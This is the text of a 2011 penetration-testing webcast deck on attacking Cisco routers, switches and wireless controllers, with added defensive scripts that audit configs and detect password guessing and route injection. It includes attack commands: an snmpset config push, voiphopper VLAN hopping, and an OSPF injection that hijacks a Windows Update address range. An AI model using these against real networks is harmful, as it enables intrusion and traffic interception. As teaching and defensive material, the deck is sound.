Pen Test Perfect Storm Part 2

The Pen Test Perfect Storm:
We Love Cisco!
Pen Test Techniques – Part 6
By Joshua Wright, Kevin Johnson,
& Ed Skoudis
Hosted by Melissa England of Core
Copyright 2011, All Rights Reserved
Pen Test Perfect Storm Part 6 - ©2011, Wright/Johnson/Skoudis
1
Outline
• The Power of Combined Attacks
• Network Attack Tools and Techniques
• Web App Attack Tools and Techniques
• Wireless Attack Tools and Techniques
• Combining It All Together – A Scenario
• Conclusions and Q&A
Previously on
Firefly…
• To recap, in Parts 1-3 of this trilogy, we discussed how
penetration tests and testers are categorized:
1) Network tests 2) Web application tests 3) Wireless tests
4) Others, but those are the biggies…
• In Parts 4 and 5 of the Trilogy, we focused on applying
these techniques to Microsoft and Adobe products,
respectively
• We also proposed that…
• …if you want to be a great pen tester…
• …make sure you can pivot between network pen tests, web
app tests, and wireless pen tests
– Furthermore, integrate these attack vectors together into a much
more powerful combined attack
Today's Focus
• Continue the concept of combined testing,
focusing on the great features of Cisco products
– Also, many techniques we'll cover are applicable to
other network device manufacturers
• To illustrate the pragmatic and iterative nature
of combined tests, we'll alter the order this
time:
1) Network exploitation
2) Web App attack
3) Wireless attack… and then more network (because
we can)!
SNMP Community String
Enumeration
• To manipulate target network devices managed via SNMP, we
could attempt to determine community strings
– Sniff SNMPv1 or SNMPv2c clear text
– You'd be a fool not to sniff traffic and look for UDP 161 just in case
some SNMP traffic leaks to clients or servers you control
– Also, try community string guessing attacks against SNMPv1, v2c, or v3
• Determining SNMP Read is nice… Read/Write is awesome
• Numerous tools available for automated community string
guessing
– Can be relatively quick, since it is just UDP
– Some organizations use trivial community strings
[Figure: pen tester guessing community strings at a router: "public?", "private?", "snmp?"… and the router answers "snmp…Oui!"*]
*I am not sure why, but, in my head, all routers speak with sexy French accents.
Tools for SNMP Community
String Automated Guessing
• Onesixtyone by Solar Eclipse
– Free at www.phreedom.org/solar/onesixtyone/
– Speedy – Sends lots of requests in parallel, not waiting for responses
– Doesn't stop on success – enumerates all valid community strings for a
device
– Good for large-scale iteration through network address space
– dict.txt includes 49 common strings
• Free Metasploit module: auxiliary/scanner/snmp/community
– Nice, flexible RHOSTS options (range, list, file, IPv6, etc.)
– Stops once it gets a success on a given target (maybe just Read)
– Includes snmp.txt file with 119 common strings
• Core IMPACT
– Integration with flexible IMPACT user interface
– Useful for pivoting through conquered devices
Using SNMP R and RW Access
• If you achieve SNMP Read/Write access, you own the
device
– We can download running or startup config for detailed analysis
– Crack the passwords for it and use them on other network devices
• Cisco enable passwords are typically stored using salted MD5, easily cracked
using John or oclHashcat
– We could dump CDP, ARP cache, and routing table for target
enumeration
– We could reconfigure the device to allow all sorts of access, such as
telnet, ssh, http, or https
– Once we get telnet or ssh access, Core IMPACT provides a virtual
agent for control
• Unlike traditional Core agents, code doesn't run on target Cisco device…
instead, it controls the target across the network
• We can then pivot through the device easily using the Core GUI
From SNMP To SSH or HTTPS
• We could use SNMP RW to enable telnet, ssh, http, or
https as follows:
– Use snmpblow.pl (free at
www.scanit.be/en_US/snmpblow.html) to make router push
configuration to our tftp server
– Use snmpwalk (part of net-snmp-utils) to look at SNMP MIBs
on the device and determine which ones are associated with
updating the configuration
– Edit downloaded configuration, adding whatever you'd like:
• ip http secure-server
• transport input ssh
– Put modified config on our own tftp server
– Use snmpset to force it to update the configuration
$ snmpset -v2c -c <commstring> <routerIP> <MIB>.<tftpIP> s "<config.file>"
[Figure: pen tester and router exchanging configs over TFTP. Tester: "Edit config: transport input ssh"; router: "Oui! Oui!"]
• Be careful! You should get explicit permission, and
choose a less-important network device
– Perhaps an example set up just for demonstration purposes
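The configuration weaknesses the last two slides rely on (guessable strings, RW communities, communities with no ACL, clear-text management) are all visible in a device's own running config. This is an added example, not part of the webcast or any tool it mentions: it audits a constructed IOS config fragment for those conditions; the weak-string list is a small constructed subset of the kind of entries found in wordlists such as onesixtyone's dict.txt.

```python
import re

# Constructed sample IOS configuration fragment (not from any real device).
SAMPLE_CONFIG = """\
snmp-server community public RO
snmp-server community private RW
snmp-server community s3cr3tRO RO 10
snmp-server community Xq9!kLm2 RW 10
snmp-server community Xq9!kLm2 view cutdown RO 10
ip http server
line vty 0 4
 transport input telnet ssh
"""

# Constructed subset of the kind of entries found in guessing lists such as
# onesixtyone's dict.txt; extend it with the wordlists you actually test with.
WEAK_STRINGS = {"public", "private", "snmp", "cisco", "admin", "manager"}

# snmp-server community <string> [view <name>] RO|RW [<acl>]
SNMP_RE = re.compile(r"^snmp-server community (\S+)(?: view (\S+))? (RO|RW)(?: (\S+))?$")

def audit_config(config):
    """Return (config line, finding) pairs for SNMP and management weaknesses."""
    findings = []
    for raw in config.splitlines():
        line = raw.strip()
        m = SNMP_RE.match(line)
        if m:
            comm, _view, mode, acl = m.groups()
            if comm.lower() in WEAK_STRINGS:
                findings.append((line, "community string appears in common guessing lists"))
            if mode == "RW":
                findings.append((line, "read-write community: config can be pulled or replaced via TFTP MIBs"))
            if acl is None:
                findings.append((line, "no ACL: any host reaching UDP/161 may try this string"))
        elif line == "ip http server":
            findings.append((line, "clear-text HTTP management enabled"))
        elif line.startswith("transport input") and "telnet" in line.split():
            findings.append((line, "telnet permitted on vty: credentials cross the wire in clear text"))
    return findings

if __name__ == "__main__":
    for cfg_line, reason in audit_config(SAMPLE_CONFIG):
        print(f"{cfg_line!r}: {reason}")
```

Run it against a config pulled with `show running-config`; a clean result is one where every community has an ACL, RW is absent or view-restricted, and only SSH/HTTPS are left as management transports.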
Manipulating Switches to
Create SPAN ports
• If you are able to compromise a network
switch (again, via SNMP RW, telnet, ssh,
or other method), you could reconfigure
it to mirror ports or entire VLANs
– Or reconfigure VLANs
• Nice for sniffing, even in an environment
with Dynamic ARP inspection and other
anti-sniffing defenses
• When you control the network
infrastructure, you wield great power
over the target environment
– But with great power comes great
responsibility
[Figure: pen tester tells the switch "Make this port a SPAN port!"; switch: "Like, totally, dude!!"*]
*Inside my head, all switches speak with a California surfer-dude accent.
Fingerprinting Network
Devices with Yokoso!
• Most, if not all, Cisco devices and systems have web interfaces to target
– If discovered, these allow for various attack opportunities
• Yokoso is a collection of web interface fingerprints based on application
resources
• Fingerprints are the URIs of unique resources
– Resources within the administration interfaces
– Unique files (e.g., page, image name, style sheet, etc.) that identify the
system/software
• Project led by Kevin Johnson, Frank DiMaggio, and Justin Searle
– http://yokoso.secureideas.net
• Penetration testers can use these fingerprints within XSS attacks or
within other attack scripts
• They fulfill two purposes:
– Infrastructure discovery
– Browser history harvesting
Brute-Forcing Accounts via
Password Guessing
• As we saw earlier with SNMP community strings, brute
forcing accounts is a common attack
– Surprising how many pen testers don't use it
• With care, brute force attacks can gain us access to web
administration interfaces
– We can administer the infrastructure!
• Two pieces are needed:
– User and password dictionaries
– Brute force tool or script
• Phenoelit provides a list of common default
username/password combos
– http://www.phenoelit-us.org/dpl/dpl.html
• Burp Suite includes an excellent HTTP brute forcer
Burp Suite
• I get asked often which proxy is my favorite one
– Josh has asked me at least 4 times!?!?
• Burp Suite is a very powerful suite of tools
– Available from http://portswigger.net
• Provides low-level access to the HTTP protocol
– Burp allows us to modify requests and responses, but does not break things out in
the user friendly way WebScarab does
• Requires deeper knowledge of HTTP than other similar tools
– It uses a proxy as the core to feed the tool information
– We need to understand the protocol to know how to abuse it
• When we find web interfaces, such as Cisco ones, we browse them through
Burp
– This allows us to look for flaws or attack the system
• Burp has two versions: free and professional edition
– What we want to accomplish next is available in both
– The free version does throttle Intruder, the tool we will use
Password Enumeration with
Burp Intruder
• Intruder is my brute forcer of choice
• We feed the Cisco interface authentication request through the proxy
– Great fuzzing tool
– We need to ensure we actually submit the credentials
• Marking the request parameters for brute forcing
– Since this example uses HTTP Basic auth, we need to create some rules
– These rules format the parameter correctly
• A password dictionary is selected in the payload tab
– This tab is where we set the mangle rules for the parameter
• In the results we look for a response that's different
– Typically by receiving a response with a different size
[Screenshot callouts: "Encoded authentication" (the Basic auth header marked as the payload position) and "Rules to format parameter correctly" (the payload processing rules)]
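The same signal the tester watches for in Intruder's results, one response that differs after a run of identical failures, is what the device's or web server's access log shows the defender: a burst of 401s from one source, then a 200. This added example (not from the webcast or from Burp) runs that detection over constructed combined-format log lines; the admin path, user names and addresses are placeholders.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed web-server access log in combined format (not real traffic); the
# admin path and user names are placeholders.
SAMPLE_LOG = """\
10.10.200.2 - - [15/Mar/2011:10:00:01 -0400] "GET /admin/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
10.10.200.2 - - [15/Mar/2011:10:00:01 -0400] "GET /admin/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
10.10.200.2 - - [15/Mar/2011:10:00:02 -0400] "GET /admin/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
10.10.200.2 - - [15/Mar/2011:10:00:02 -0400] "GET /admin/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
10.10.200.2 - - [15/Mar/2011:10:00:03 -0400] "GET /admin/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
10.10.200.2 - - [15/Mar/2011:10:00:03 -0400] "GET /admin/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
10.10.200.2 - admin [15/Mar/2011:10:00:04 -0400] "GET /admin/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
192.168.1.50 - - [15/Mar/2011:10:02:10 -0400] "GET /admin/ HTTP/1.1" 401 381 "-" "Mozilla/5.0"
192.168.1.50 - jdoe [15/Mar/2011:10:02:15 -0400] "GET /admin/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

# source, ident, user, timestamp, method, path, status, size
LOG_RE = re.compile(r'^(\S+) \S+ (\S+) \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) (\S+)')

def parse_ts(text):
    return datetime.strptime(text, "%d/%b/%Y:%H:%M:%S %z")

def detect_basic_auth_guessing(log_text, threshold=5, window=timedelta(seconds=60)):
    """Flag sources with `threshold` HTTP 401s inside `window`, and a 200 that follows them."""
    recent = defaultdict(deque)   # source IP -> timestamps of recent 401s
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        src, user, ts_text, _method, path, status, _size = m.groups()
        ts = parse_ts(ts_text)
        failures = recent[src]
        while failures and ts - failures[0] > window:   # drop 401s outside the window
            failures.popleft()
        if status == "401":
            failures.append(ts)
            if len(failures) == threshold:
                findings.append((src, f"{threshold} HTTP 401s on {path} within {window.seconds}s: guessing in progress"))
        elif status == "200" and len(failures) >= threshold:
            findings.append((src, f"HTTP 200 as '{user}' on {path} after {len(failures)} failures: credentials likely guessed"))
            failures.clear()
    return findings
```

A single typo followed by a correct login (the second client above) stays below the threshold, so the rule reports only the sustained run; tune `threshold` and `window` to the rate your own admin interfaces see.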
Cisco Wireless LAN Controller
as an Attack Target
• Popular attack target
– 2007: 8 flaws from XSS to authentication bypass,
undocumented static admin username/password
– 2008: A quiet year for WLC vulnerabilities
– 2009: 9 flaws including SQL injection, ACL evasion,
DoS, unauthorized remote configuration change
– 2010: 7 flaws including authentication bypass
• Common language in CVE filings:
– "via unspecified vectors", "unspecified vulnerability",
"via unspecified network traffic"
– <insert snarky comment here>
• Supporting infrastructure also a target
– Cisco ACS EAP/TLS bypass vulnerability, buffer
overflows in malformed EAP traffic, etc.
Cisco WLCCP Wireless Capture
[Screenshot: Wireshark capture of WLCCP traffic. Callouts: "Sent in plaintext (including the WLC IP address) even when WLAN is encrypted! Also seems like a good fuzzing target, IMHO." and "IOS version also disclosed, not interpreted by Wireshark"]
Voice VLAN Hopping
• Cisco switches accommodate a special
"voice VLAN" feature
– VoIP phone plugs into switch, PC plugs
into VoIP phone
– Switch must trunk two VLANs
• Attacker can identify VLAN number
used for voice by observing CDP traffic
• Despite port configured as access,
attacker can create 802.1Q trunk
– Access to voice VLAN
Example port configuration:
interface FastEthernet0/2
 switchport access vlan 100
 switchport mode access
 switchport voice vlan 200
voiphopper
voiphopper.sf.net
• Automates voice VLAN hopping attack
– Written by Jason Ostrom
– Listens for CDP to extract voice VLAN#
– Creates interface, requests DHCP address
– Must boot Linux natively, not as a Windows guest
• Includes attack options for Cisco, Avaya and Nortel
switches
# ./voiphopper -c 0 -i eth0
VoIP Hopper 1.00 Running in CDP Sniff Mode
Capturing CDP Packets on eth0
Captured IEEE 802.3, CDP Packet of 371 bytes
Discovered VoIP VLAN: 200
Added VLAN 200 to Interface eth0
Current MAC: 00:10:c6:ce:f2:ab
Attempting dhcp request for new interface eth0.200
VoIP Hopper dhcp client: received IP address for eth0.200: 10.10.200.2
Establishing a Virtual IOS Lab
• IOS emulators have gone from "simulators" to full
IOS VMs
• Dynamips – Free Cisco 7200/3600/3700/2600
series router emulator
– Supports multi-port virtual switching network module
hardware as well
• Dynagen - CLI front-end for Dynamips
• GNS3 - GUI front-end that bundles Dynamips,
Dynagen, and Qemu
• Available for Windows or Linux
Create a virtual router environment for testing, or as
an attack platform
GNS3 Example
You must supply the device
image file for each device!
Simple install and configuration process: www.gns3.net/download
Cisco Router as an Attack Tool
• As a pen tester, create and keep a VM
of a "Cisco router" (Dynagen)
• Useful to become part of the internal
network infrastructure
– Joining OSPF or other IGP routing
topologies
• Opportunity to inject malicious routes
inside an organization
Unauthenticated
OSPF Traffic FTW!
Use This With Extreme Caution!
Post-Routing Participation
Commands
• Useful Information Collection Commands
router# show ip route
router# show ip rip database
router# show ip ospf neighbors
router# show cdp neighbor
• Inject IGP Routes for Hosts On the Internet, Redirecting to Your Attack System
router(config)# interface FastEthernet0/1
router(config-if)# desc This is the network for download.windowsupdate.com
router(config-if)# ip address 70.37.129.70 255.255.255.0
router(config-if)# router ospf 1
router(config-router)# network 70.37.129.0 0.0.0.255
Did we mention that this should be used with EXTREME CAUTION?
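The injected route above has two properties a defender can key on: an IGP inside the organization is suddenly carrying a prefix that belongs on the Internet, and it is learned from a next hop that is not one of the known routers. This added example (not from the webcast) checks a constructed `show ip route` excerpt for both conditions; the address plan and the set of known OSPF routers are assumed site knowledge.

```python
import ipaddress
import re

# Constructed 'show ip route' excerpt (not from a real router); the 70.37.129.0/24
# entry mirrors the route injected in the slide above.
SAMPLE_ROUTES = """\
Codes: C - connected, O - OSPF, IA - OSPF inter area, E2 - OSPF external type 2
C        10.10.200.0/24 is directly connected, FastEthernet0/1
O        10.20.0.0/16 [110/3] via 10.10.1.1, 02:10:00, FastEthernet0/0
O        70.37.129.0/24 [110/2] via 10.10.200.2, 00:01:12, FastEthernet0/1
O E2     10.99.0.0/16 [110/20] via 10.10.200.2, 00:00:40, FastEthernet0/1
"""

# Assumed site knowledge: the internal address plan and the routers expected to speak OSPF.
ADDRESS_PLAN = [ipaddress.ip_network("10.0.0.0/8")]
KNOWN_OSPF_ROUTERS = {"10.10.1.1"}

# Matches OSPF-learned entries: "O", "O IA", "O E1", "O E2", "O N1", "O N2".
OSPF_RE = re.compile(r"^O(?: (?:IA|E1|E2|N1|N2))?\s+(\S+/\d+)\s+\[\d+/\d+\] via (\S+),")

def audit_ospf_routes(show_ip_route):
    """Return (prefix, next_hop, reason) for OSPF routes that look injected."""
    suspicious = []
    for line in show_ip_route.splitlines():
        m = OSPF_RE.match(line)
        if not m:
            continue
        prefix, next_hop = m.groups()
        net = ipaddress.ip_network(prefix)
        reasons = []
        if not any(net.subnet_of(plan) for plan in ADDRESS_PLAN):
            reasons.append("prefix outside the internal address plan")
        if next_hop not in KNOWN_OSPF_ROUTERS:
            reasons.append("next hop is not a known OSPF router")
        if reasons:
            suspicious.append((prefix, next_hop, "; ".join(reasons)))
    return suspicious

if __name__ == "__main__":
    for prefix, next_hop, reason in audit_ospf_routes(SAMPLE_ROUTES):
        print(f"{prefix} via {next_hop}: {reason}")
```

Feeding this the output of `show ip route` from each core router on a schedule turns the slide's "unauthenticated OSPF" weakness into an alert; OSPF MD5 authentication and passive interfaces on user-facing segments remove the weakness itself.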
Scenario: An Intranet Pen Test:
Let's Gather Some Info
[Diagram used for each scenario step: Pen Tester, AP, Wireless LAN Controller, Target Network]
1. Pen tester runs wireless sniffer in monitor mode. Gathers info about EAP type. Sees WLCCP traffic and EAP-Fast… A Cisco environment! Also discovers IP of WLC.
Scenario:
Connect to Restricted VLAN
2. Pen tester connects to Restricted Guest VLAN.
Scenario:
VLAN Hopping
3. Pen tester sniffs CDP, identifies voice VLAN number, and creates 802.1Q trunk using voiphopper, resulting in VLAN hopping.
Scenario: SNMP Community
String Enumeration
4. Pen tester discovers limited intranet accessibility through voice VLAN.
5. Pen tester launches community string guessing attack against router… RW success!
Scenario:
Alter Router Config – ACL Tweak
6. With SNMP RW, pen tester causes router to update config, altering ACL that limited VoIP LAN so pen tester's IP address has unfettered access to intranet.
Scenario:
Access WLAN Controller
7. Pen tester accesses Wireless LAN Controller based on IP address discovered in Step 1.
Scenario:
Burp to Enumerate WLC Passwords
8. Pen tester uses Burp to enumerate passwords on WLC, gaining access to administrative console of wireless infrastructure.
Scenario:
Add New Virtual SSID to AP
9. Pen tester uses WLC to reconfigure access point, adding a new virtual SSID with access to pen tester chosen VLANs on the enterprise network (a.k.a. "Ghost in the AP")
Scenario:
Unfettered Intranet Access!
10. Pen tester now has unfettered access to intranet… Game Over.
Conclusions
• Combined attack vectors allow for far deeper penetration
into most target networks than separate vectors allow
• Combined pen testing more accurately reflects an
attacker's ability to exploit the network and systems
• Network-centric capabilities create attacker opportunities
• We've looked at useful features of Core IMPACT, free
Metasploit, SNMP tools, Yokoso!, Dynamips, and much
more
– Integrating these tools for powerful attacks beyond each tool's
individual capabilities
Upcoming In-Depth
SANS Pen Test Courses
• SANS 560: Network Pen Testing and Ethical Hacking
– Columbus, Ohio, April 11: Crowley
– Amsterdam, Netherlands, May 9: Sims
– Baltimore, June 15: Galbraith
– Wash DC, July 17: Skoudis
• SANS 542: Web App Pen Testing and Ethical Hacking
– San Diego, CA, May 5: Johnson
– vLive, May 16: Johnson & Misenar
– London, June 6: Shackleford
– Wash DC, July 17: Johnson
• SANS 617: Wireless Ethical Hacking, Pen Testing, & Defenses
– vLive, April 19: Wright
– Victoria, BC, May 9: Pesce
– Amsterdam, Netherlands, May 16: Armstrong
– Wash DC, July 17: Wright
New! SANS Security 660
• Advanced Penetration Testing course
• By Wright, Galbraith, and Sims
• Reston, VA, April 16: Strand
• Amsterdam, Netherlands, May 16: Sims
• Washington DC, July 17: Sims
• vLive, August 30: Sims, Wright, Galbraith!!!
Thank You &
Behind the Scenes
• We'd like to offer a special thank you to
the staff of Core for helping to make
this "trilogy" of webcasts possible:
– Mike Yaffe
– Alex Horan
– Melissa England
– Selena Proctor
– Chris Burd
– And the rest of
the gang!
Pen Test Perfect Storm Trilogy…
Part 6
The End
?